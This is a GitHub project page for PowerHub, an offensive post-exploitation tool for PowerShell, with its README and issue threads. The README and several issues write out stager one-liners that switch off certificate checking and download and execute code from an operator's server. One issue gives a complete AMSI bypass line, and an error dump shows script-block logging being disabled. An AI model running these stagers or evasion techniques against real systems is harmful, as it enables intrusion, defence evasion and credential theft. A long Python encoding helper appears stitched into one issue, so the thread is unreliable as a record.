adrianvollmer / powerhub

A post exploitation tool based on a web application, focusing on bypassing endpoint protection and application whitelisting

Home Page: https://adrianvollmer.github.io/PowerHub/

License: MIT License

Python 1.75% JavaScript 0.06% CSS 0.03% HTML 0.24% PowerShell 97.79% C 0.01% C# 0.02% VBScript 0.03% Jinja 0.04% Makefile 0.02%
python pentest powershell post-exploitation remote-admin-tool

powerhub's Introduction

PowerHub

PowerHub is a convenient post exploitation tool for PowerShell which aids a pentester in transferring data, in particular code which may get flagged by endpoint protection. Features:

  • Fileless
  • Stateless
  • Cert pinning
  • String "obfuscation" by RC4 encryption
  • Choose your AMSI Bypass
  • Transparent aliases for in-memory execution of C# programs

PowerHub Webapp (screenshot)

During an engagement where you have a test client available, one of the first things you want to do is run SharpHound, Seatbelt, PowerUp, Invoke-PrivescCheck or PowerSploit. So you need to download the files, mess with endpoint protection, disable the execution policy, etc. PowerHub provides an (almost) one-click solution for this. Oh, and you can also run arbitrary binaries (PE and shell code) entirely in-memory using PowerSploit's modules, which is sometimes useful to bypass application whitelisting.

Your loot (Kerberos tickets, passwords, etc.) can be easily transferred back either as a file or a text snippet, via the command line or the web interface. PowerHub also helps with collaboration in case you're a small team.

Here is a simple example (grab information about local groups with PowerView and transfer it back):

PS C:\Users\avollmer> [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$Nxois='bZeVBC4vZfakT5SmCcaFam6IRY6UNLnC';$Plukgmio=New-Object Net.WebClient;IEX $Plukgmio.DownloadString('https://192.168.11.2:8443/')
  _____   _____  _  _  _ _______  ______ _     _ _     _ ______
 |_____] |     | |  |  | |______ |_____/ |_____| |     | |_____]
 |       |_____| |__|__| |______ |    \_ |     | |_____| |_____]
2.0.0                       written by Adrian Vollmer, 2018-202
Run 'Help-PowerHub' for help
PS C:\Users\avollmer> Get-HubModule PowerView

Name   : /home/avollmer/.local/share/powerhub/modules/PowerSploit/Recon/PowerView.ps1
Type   : ps1
N      : 205
Loaded : True
Alias  :

PS C:\Users\avollmer> Get-LocalGroup | PushTo-Hub -Name groups.json

Documentation

Read the docs at https://adrianvollmer.github.io/PowerHub/.

Credits

PowerHub is partially based on the awesome work of zc00l, @am0nsec, mar10, p3nt4. And of course, it would be nothing without @harmj0y, @mattifestation and the many other contributors to PowerSploit.

Thanks!

Author and License

Adrian Vollmer, 2018-2023. MIT License.

Disclaimer

Use at your own risk. Do not use without full consent of everyone involved. For educational purposes only.

powerhub's People

Contributors: adrianvollmer, exploide

powerhub's Issues

Create a nicer CSS

I suck at CSS, so if somebody wants to help me to add some eye candy, be my guest. I like a sleek, simple, minimal but aesthetic style.

Make clipboard persistent

This will require a database, probably sqlite. Where should it be stored? Probably somewhere in $HOME.

Avoid Write-Host

Use Write-Verbose or something to make the script more PoSh idiomatic

issue with Run-EXE

Hi,

I am having issues with the example provided for run-exe with a meterpreter exe. I get an error about DEP compatibility and then it closes the powershell window. Am I doing something wrong?

PowerShellMafia/PowerSploit#362 not sure if this is similar

Uri path

powerhub.py: error: the following arguments are required: URI_HOST
What should be indicated here? An IP? The IP of my server?

Provide webapp alternative without JS

The fancy-looking webapp uses Bootstrap, parts of which require jQuery, which doesn't support IE8 or lower. It would be nice to be able to use the webapp without any JS at all.

Automatically add/remove shell entries

Currently, the user needs to reload the page. Since we now have push notifications for events like a new incoming shell, the card list should update automatically

Make reverse shell more persistent

Keep alive in the background and try to reconnect to the receiver every 5 seconds or so. Don't forget a maximum life time with a default value of 5 days.

1.3 fails to show installed modules

Been in love with this tool and it's honestly a masterpiece.

One issue with the new version 1.3 ...
When I updated from 1.2 to 1.3 I lost the ability to view my installed modules.

[Screenshot attached: Screenshot_2019-08-02-16-30-52~2]

I have remedied this by staying at 1.2 but would like to hop on 1.3 due to the TLS jawn.

Windows 7 compatibility

As briefly described via email, the stager throws errors when executing it on Windows 7 with PS 2.

Windows PowerShell
Copyright (C) 2009 Microsoft Corporation. Alle Rechte vorbehalten.

PS C:\Users\foouser> [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$K=new-object net.w
ebclient;IEX $K.downloadstring('https://192.168.1.10:8000/0');
Ausnahme beim Aufrufen von "Disable" mit 0 Argument(en):  "Methode nicht gefunden: "IntPtr System.IntPtr.op_Addition(In
tPtr, Int32)"."
Bei Zeile:1 Zeichen:23
+ [Bypass.AMSI]::Disable <<<< ()
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : DotNetMethodException

Sie können keine Methode für einen Ausdruck mit dem Wert NULL aufrufen.
Bei Zeile:82 Zeichen:82
+ $settings = [Ref].Assembly.GetType($string2).GetField($string3,$string4).GetValue <<<< ($null);
    + CategoryInfo          : InvalidOperation: (GetValue:String) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull

In einem NULL-Array kann kein Index erstellt werden.
Bei Zeile:83 Zeichen:11
+ $settings[ <<<< $string5] = @{}
    + CategoryInfo          : InvalidOperation: (HKEY_LOCAL_MACH...iptBlockLogging:String) [], RuntimeException
    + FullyQualifiedErrorId : NullArray

In einem NULL-Array kann kein Index erstellt werden.
Bei Zeile:84 Zeichen:11
+ $settings[ <<<< $string5].Add($string6, "0")
    + CategoryInfo          : InvalidOperation: (HKEY_LOCAL_MACH...iptBlockLogging:String) [], RuntimeException
    + FullyQualifiedErrorId : NullArray

Probably because there is no AMSI on Win7.

Related #17

Otherwise, great tool :)

Figure out compatibility with older PowerShell versions

I developed the reverse shell by testing it on PS 5.1.17134.590, Windows 10.0.17134.590. Some features certainly won't work on older versions. It's important to have a fall back to a dumber shell in case the system is old. Let's aim at supporting everything down to PSv2.

RuntimeError: Working outside of application context

Suddenly a weird error occurs when starting powerhub. Since nothing has changed for a while, maybe it is due to some updated dependency?

$ powerhub --auth xxx:xxx 192.168.122.244
I 2022-10-20 13:30:40 Importing modules...
Traceback (most recent call last):
  File "/home/user/repos/PowerHub/venv/bin/powerhub", line 8, in <module>
    sys.exit(main())
  File "/home/user/repos/PowerHub/venv/lib/python3.10/site-packages/powerhub/__main__.py", line 8, in main
    PowerHubApp().run(background=background)
  File "/home/user/repos/PowerHub/venv/lib/python3.10/site-packages/powerhub/app.py", line 66, in __init__
    self.init_db()
  File "/home/user/repos/PowerHub/venv/lib/python3.10/site-packages/powerhub/app.py", line 111, in init_db
    init_db(db)
  File "/home/user/repos/PowerHub/venv/lib/python3.10/site-packages/powerhub/sql.py", line 18, in init_db
    _db.create_all()
  File "/home/user/repos/PowerHub/venv/lib/python3.10/site-packages/flask_sqlalchemy/extension.py", line 868, in create_all
    self._call_for_binds(bind_key, "create_all")
  File "/home/user/repos/PowerHub/venv/lib/python3.10/site-packages/flask_sqlalchemy/extension.py", line 839, in _call_for_binds
    engine = self.engines[key]
  File "/home/user/repos/PowerHub/venv/lib/python3.10/site-packages/flask_sqlalchemy/extension.py", line 628, in engines
    app = current_app._get_current_object()  # type: ignore[attr-defined]
  File "/home/user/repos/PowerHub/venv/lib/python3.10/site-packages/werkzeug/local.py", line 513, in _get_current_object
    raise RuntimeError(unbound_message) from None
RuntimeError: Working outside of application context.

This typically means that you attempted to use functionality that needed
the current application. To solve this, set up an application context
with app.app_context(). See the documentation for more information.

Here is a list of the dependencies I got after a fresh install.

$ python --version
Python 3.10.7

$ pip freeze
aesedb==0.1.0
aiosmb==0.4.3
aiowinreg==0.0.7
asn1crypto==1.5.1
asyauth==0.0.6
asysocks==0.2.2
attrs==22.1.0
Automat==20.2.0
bidict==0.22.0
cffi==1.15.1
cheroot==8.6.0
click==8.1.3
colorama==0.4.5
constantly==15.1.0
cryptography==38.0.1
defusedxml==0.7.1
Flask==2.2.2
Flask-SocketIO==5.3.1
Flask-SQLAlchemy==3.0.2
greenlet==1.1.3.post0
hyperlink==21.0.0
idna==3.4
incremental==22.10.0
itsdangerous==2.1.2
jaraco.functools==3.5.2
Jinja2==3.1.2
json5==0.9.10
MarkupSafe==2.1.1
minidump==0.0.21
minikerberos==0.3.3
more-itertools==9.0.0
msldap==0.4.6
oscrypto==1.3.0
PowerHub @ file:///home/user/repos/PowerHub
prompt-toolkit==3.0.31
pyasn1==0.4.8
pyasn1-modules==0.2.8
pycparser==2.21
pycryptodomex==3.15.0
pyOpenSSL==22.1.0
pypykatz==0.6.2
python-engineio==4.3.4
python-magic==0.4.27
python-socketio==5.7.2
PyYAML==6.0
service-identity==21.1.0
six==1.16.0
SQLAlchemy==1.4.42
tqdm==4.64.1
Twisted==22.8.0
typing_extensions==4.4.0
unicrypto==0.0.9
watchdog==2.1.9
wcwidth==0.2.5
Werkzeug==2.2.2
winacl==0.1.5
WsgiDAV==4.0.2
zope.interface==5.5.0

Add ability to cancel remote job

When pressing CTRL-C in the shell, one option one would like to have is to cancel the currently running job, maybe because it is taking too long. We'd have to move from using $PowerShell.Invoke() to $PowerShell.BeginInvoke() to run the jobs asynchronously.

Modules are not properly imported

Since 4c706b7, modules are not properly imported. PowerShell cannot find the commands:

> lhm SharpHound
Name                                    Type N  Loaded
----                                    ---- -  ------
ps1/BloodHound/Ingestors/SharpHound.ps1 ps1  30   True

> Invoke-BloodHound -CollectionMethod All -Domain test.local -LDAPUser test -LDAPPass test
The term 'Invoke-BloodHound' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
    + CategoryInfo          : ObjectNotFound: (Invoke-BloodHound:String) [Invoke-Expression], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException,Microsoft.PowerShell.Commands.InvokeExpressionCommand

Use of multiple crypto libraries

On dev branch, requirements.txt currently lists pycryptodome as a dependency for AES encryption. Though, when running powerhub.py, it errors out with ModuleNotFoundError: No module named 'Cryptodome'.

This is because the package pycryptodome actually makes available a module named Crypto. The module Cryptodome you use here is instead contained in a package named pycryptodomex. So the entry in requirements.txt should probably be fixed.

I also noticed that PowerHub makes use of pyOpenSSL for key and certificate handling.
The project page of pyOpenSSL states:

Note: The Python Cryptographic Authority strongly suggests the use of pyca/cryptography where possible. If you are using pyOpenSSL for anything other than making a TLS connection you should move to cryptography and drop your pyOpenSSL dependency.

That cryptography package is also already present, currently as a dependency of service_identity.

So PowerHub currently has pycryptodome/pycryptodomex, pyOpenSSL and cryptography installed. I bet one of them is sufficient (probably cryptography) but I haven't looked into the details.

Twisted exceptions

This already came up in another issue, but just to keep track of it: twisted occasionally throws exceptions, cluttering the output of PowerHub.

Unhandled Error
Traceback (most recent call last):
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/python/log.py", line 103, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/python/log.py", line 86, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/python/context.py", line 122, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/python/context.py", line 85, in callWithContext
    return func(*args,**kw)
--- <exception caught here> ---
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/internet/posixbase.py", line 614, in _doReadOrWrite
    why = selectable.doRead()
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/internet/tcp.py", line 243, in doRead
    return self._dataReceived(data)
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/internet/tcp.py", line 249, in _dataReceived
    rval = self.protocol.dataReceived(data)
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/protocols/basic.py", line 579, in dataReceived
    why = self.rawDataReceived(data)
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/web/http.py", line 645, in rawDataReceived
    self.handleResponsePart(data)
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/web/proxy.py", line 77, in handleResponsePart
    self.father.write(buffer)
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/web/server.py", line 238, in write
    http.Request.write(self, data)
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/web/http.py", line 1118, in write
    self.channel.writeHeaders(version, code, reason, headers)
builtins.AttributeError: 'NoneType' object has no attribute 'writeHeaders'

Unhandled Error
Traceback (most recent call last):
  File "/home/user/Downloads/PowerHub/powerhub/reverseproxy.py", line 78, in run_proxy
    reactor.run()
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/internet/base.py", line 1272, in run
    self.mainLoop()
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/internet/base.py", line 1284, in mainLoop
    self.doIteration(t)
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/internet/epollreactor.py", line 235, in doPoll
    log.callWithLogger(selectable, _drdw, selectable, fd, event)
--- <exception caught here> ---
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/python/log.py", line 103, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/python/log.py", line 86, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/python/context.py", line 122, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/python/context.py", line 85, in callWithContext
    return func(*args,**kw)
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/internet/posixbase.py", line 627, in _doReadOrWrite
    self._disconnectSelectable(selectable, why, inRead)
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/internet/posixbase.py", line 258, in _disconnectSelectable
    selectable.connectionLost(failure.Failure(why))
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/internet/tcp.py", line 519, in connectionLost
    self._commonConnection.connectionLost(self, reason)
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/internet/tcp.py", line 327, in connectionLost
    protocol.connectionLost(reason)
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/web/http.py", line 599, in connectionLost
    self.handleResponseEnd()
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/web/proxy.py", line 87, in handleResponseEnd
    self.father.finish()
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/web/server.py", line 249, in finish
    return http.Request.finish(self)
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/web/http.py", line 1046, in finish
    "Request.finish called on a request after its connection was lost; "
builtins.RuntimeError: Request.finish called on a request after its connection was lost; use Request.notifyFinish to keep track of this.

Use nginx as a reverse proxy

I'm reluctant to include nginx as a dependency, but twisted is simply not powerful enough. It can't set the X-Forwarded-Host header, so when Flask redirects to a different URL, it doesn't know the host or protocol which the client used to initiate the request.

I'll try to not make it a mandatory dependency, such that everything runs without. However, SSL likely won't work. This must be why everyone discourages the use of SSL with Flask directly. Not a production server, and so on...

Save shell log automatically

It's important because you may lose valuable data otherwise. Again, we should store it somewhere in $HOME, just like the persistent clipboard (#25). $XDG_DATA_HOME should be fine.

Listing and loading hub modules

Currently, payload.ps1 contains full paths to the available modules.
E.g. /home/user/.local/share/powerhub/modules/ps1/PowerSploit/Recon/PowerView.ps1.

Is this information really needed on the target side?
It contains details like the attacker's name and directories, which might be sensitive.

Furthermore the length of the full path can be a problem for the layout of the lshm table.
I have seen output where it got truncated at the end, cutting off the actual name of the script (making them indistinguishable).

I would like to propose to strip the module path from the module names.
E.g. the line from above becomes ps1/PowerSploit/Recon/PowerView.ps1.
That's both shorter and more privacy-preserving.


While talking about the lshm table:
From a user's perspective, I don't really know what the code column is about.
I only notice it has a value once the module is loaded.
Again, this column is so wide, it destroys the table layout, since it leads to a line wrap.

Since I guess the code is only an internal identifier, it would be great to not display the code.
Instead, a short column stating something like loaded would be great, to see which modules are already present.


(Then, I'm still confused why lhm 8 does not work, while lhm 08 does.
But since you already documented that in the help, I guess there is no easy fix.
So feel free to ignore this complaint :P )

Thanks again for your work!

Support other encodings than UTF-8 in PS1 modules

I wanted to load PrivescCheck from PowerHub but it failed. Here what happened:

First, I tried to load PowerHub (current version on master) but it was detected by AMSI. So I needed to apply a manual bypass first:

PS C:\Users\User>  $K=New-Object Net.WebClient;IEX $K.DownloadString('http://example.org:8080/0?t=http&a=reflection');
IEX : In Zeile:1 Zeichen:1
+
Das Skript enthält schädliche Daten und wurde von Ihrer Antivirensoftware blockiert.
In Zeile:1 Zeichen:30
+ ... t.WebClient;IEX $K.DownloadString('http://example.org:8080/0?t=http&a= ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand

PS C:\Users\User> $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)
PS C:\Users\User>  $K=New-Object Net.WebClient;IEX $K.DownloadString('http://example.org:8080/0?t=http&a=reflection');
True
  _____   _____  _  _  _ _______  ______ _     _ _     _ ______
 |_____] |     | |  |  | |______ |_____/ |_____| |     | |_____]
 |       |_____| |__|__| |______ |    \_ |     | |_____| |_____]
                            written by Adrian Vollmer, 2018-2021
Run 'Help-PowerHub' for help

Then I tried loading PrivescCheck but it failed with syntax errors. Note that PowerHub is able to load another module like PrivescCheckOld flawlessly:

PS C:\Users\User> lshm

N Type Name                          Loaded
- ---- ----                          ------
0 ps1  ps1/PrivescCheck.ps1          False
1 ps1  ps1/PrivescCheckOld.ps1       False
2 ps1  ps1/BloodHound/AzureHound.ps1 False
3 ps1  ps1/BloodHound/SharpHound.ps1 False


PS C:\Users\User> lhm 0
Import-HubModule : Ausnahme beim Aufrufen von "Create" mit 1 Argument(en):  "In Zeile:80 Zeichen:58
+     [CmdletBinding()] param(
+                                                          ~
Schließende ")" fehlt in einem Ausdruck.
In Zeile:76 Zeichen:100
+ ... -FromBase64CompressedScriptBlock {
+                                                                        ~
Die schließende "}" fehlt im Anweisungsblock oder der Typdefinition.
In Zeile:86 Zeichen:10
+     )
+          ~
Unerwartetes Token ")" in Ausdruck oder Anweisung.
In Zeile:98 Zeichen:108
+ ... Object System.IO.MemoryStream(, $Sc ...
+                                                                 ~
Argument in der Parameterliste fehlt.
In Zeile:114 Zeichen:2
+ }
+  ~
Unerwartetes Token "}" in Ausdruck oder Anweisung."
In Zeile:240 Zeichen:13
+             Import-HubModule $_
+             ~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Import-HubModule], MethodInvocationException
    + FullyQualifiedErrorId : ParseException,Import-HubModule

PS C:\Users\User> lhm 1

Name                    Type N Loaded
----                    ---- - ------
ps1/PrivescCheckOld.ps1 ps1  1   True

But I don't think it's a problem with PrivescCheck itself, because I can load it directly with

PS C:\Users\User> IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/itm4n/PrivescCheck/master/PrivescCheck.ps1")
PS C:\Users\User>

So I assume a PowerHub bug?
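The issue title points at the encoding of the module file rather than at its contents: a server-side loader that reads every .ps1 as UTF-8 will deliver garbled text for a script saved as UTF-16 LE (the default for several Windows tools) or in a legacy code page, and the parse errors above are consistent with that. The following is an added example, not PowerHub's own code, of how a loader can detect the encoding before embedding a module. The constructed samples store one script line five different ways; the cp1252 fallback is an assumption for Western-European Windows installs and would need adjusting elsewhere.

```python
import codecs

# Added example, not PowerHub's own code: decode a .ps1 module whose encoding is
# unknown. Scripts written on Windows are frequently UTF-16 LE (with or without a
# BOM) or in a legacy code page rather than UTF-8.

FALLBACK_CODEPAGE = "cp1252"  # assumption: code page of the machine the script came from

# BOM table, longest signatures first: the UTF-32 LE BOM begins with the UTF-16 LE BOM.
_BOMS = (
    (codecs.BOM_UTF8, "utf-8-sig"),
    (codecs.BOM_UTF32_LE, "utf-32-le"),
    (codecs.BOM_UTF32_BE, "utf-32-be"),
    (codecs.BOM_UTF16_LE, "utf-16-le"),
    (codecs.BOM_UTF16_BE, "utf-16-be"),
)


def detect_encoding(data: bytes) -> str:
    """Return the codec name that `data` should be decoded with."""
    for bom, codec in _BOMS:
        if data.startswith(bom):
            return codec
    # BOM-less UTF-16: a script starts with ASCII, so in LE every odd byte of the
    # first code units is NUL (in BE every even byte). Inspect the first four bytes.
    if len(data) >= 4:
        if data[0] != 0 and data[1] == 0 and data[3] == 0:
            return "utf-16-le"
        if data[0] == 0 and data[1] != 0 and data[2] == 0:
            return "utf-16-be"
    # No BOM and not UTF-16: accept UTF-8 if it decodes cleanly, else legacy code page.
    try:
        data.decode("utf-8")
        return "utf-8"
    except UnicodeDecodeError:
        return FALLBACK_CODEPAGE


def decode_script(data: bytes) -> str:
    """Decode script bytes to text and drop a leading BOM (U+FEFF) if one survived."""
    text = data.decode(detect_encoding(data))
    return text.lstrip("\ufeff")


# Constructed samples: the same one-line script stored five different ways.
TEXT = "Write-Output 'Grüße aus PowerShell'\r\n"
SAMPLES = {
    "utf-8": TEXT.encode("utf-8"),
    "utf-8-bom": codecs.BOM_UTF8 + TEXT.encode("utf-8"),
    "utf-16-le-bom": codecs.BOM_UTF16_LE + TEXT.encode("utf-16-le"),
    "utf-16-le": TEXT.encode("utf-16-le"),
    "cp1252": TEXT.encode("cp1252"),
}


def decode_all() -> dict:
    """Decode every sample; each result should equal TEXT regardless of storage encoding."""
    return {name: decode_script(raw) for name, raw in SAMPLES.items()}


if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:14} -> {detect_encoding(raw):10} ok={decode_script(raw) == TEXT}")
```

Once the text is decoded, the loader can re-encode it as UTF-8 (or Base64 of UTF-8) for transport so that the client side only ever has to handle one encoding; the BOM is stripped deliberately, because a stray U+FEFF in the middle of a concatenated script is itself a source of parse errors.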

AttributeError: module 'eventlet.green.select' has no attribute 'epoll'

AttributeError for python version 3.11.4 module 'eventlet.green.select' has no attribute 'epoll'

To Reproduce
Steps to reproduce the behavior:
git clone https://github.com/AdrianVollmer/PowerHub.git
apt-get install mono-mcs gcc-mingw-w64-x86-64 gcc-mingw-w64-i686
python3 -m pip install powerhub

powerhub 192.168.1.19 --auth powerhub:test123

[Screenshot of the error]

Python log:
[Screenshot]

Python versions (please complete the following information):
[Screenshot]

  • Output of pip freeze:
    [Screenshot]

Receiver discontinued?

In old versions of powerhub there seems to have been a receiver option that allowed one to catch a reverse connection from the client.

This is a very useful feature. Can it be reimplemented?

Regards

Darren

Defender Trojan:Win32/AmsiTamper.A!ams

Not sure if I am missing something, but I get flagged by Defender as Trojan:Win32/AmsiTamper.A!ams

OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.17763 N/A Build 17763

Defender 1.289.1512.0

Obfuscate Reverse Shell

It should use the session key and RC4 to obfuscate the data stream. I hesitate to call it "encryption", because there is no integrity or authenticity, but the main reason we want this is to make it impossible to fingerprint by an AV.

Passing arguments in Run-DotNetExe not working properly

For example, passing this to Seatbelt doesn't work:

-Arguments '-group=all -outputfile=file.txt'

Seatbelt says all -outputfile=file.txt is not a valid group.

So clearly something goes wrong when parsing the arguments. Might affect other Run-* Cmdlets, too.

Missing positional argument when starting powerhub

I am running powerhub like this:
powerhub 192.168.1.32

But get the following error:

I 2023-04-25 17:48:32 Generating new Diffie-Hellman parameters
Traceback (most recent call last):
  File "/usr/local/bin/powerhub", line 8, in <module>
    sys.exit(main())
  File "/usr/local/lib/python3.8/dist-packages/powerhub/__main__.py", line 13, in main
    PowerHubApp(args).run(background=background)
  File "/usr/local/lib/python3.8/dist-packages/powerhub/app.py", line 72, in __init__
    self.init_flask()
  File "/usr/local/lib/python3.8/dist-packages/powerhub/app.py", line 118, in init_flask
    from powerhub.flask import app as flask_blueprint
  File "/usr/local/lib/python3.8/dist-packages/powerhub/flask.py", line 22, in <module>
    from powerhub.hiddenapp import hidden_app
  File "/usr/local/lib/python3.8/dist-packages/powerhub/hiddenapp.py", line 13, in <module>
    from powerhub.dhkex import DH_G, DH_MODULUS, DH_ENDPOINT
  File "/usr/local/lib/python3.8/dist-packages/powerhub/dhkex.py", line 73, in <module>
    generate_diffie_hellman_params()
  File "/usr/local/lib/python3.8/dist-packages/powerhub/dhkex.py", line 21, in generate_diffie_hellman_params
    parameters = dh.generate_parameters(generator=g, key_size=KEY_SIZE)
TypeError: generate_parameters() missing 1 required positional argument: 'backend'

I installed it like suggested with pip.

Vulnerability disclosure?

Hi AdrianVollmer,

I believe I may have found some potential vulnerabilities in PowerHub. Is there a way to privately disclose them to you, or should I open a (public) issue here?

BR
six-two
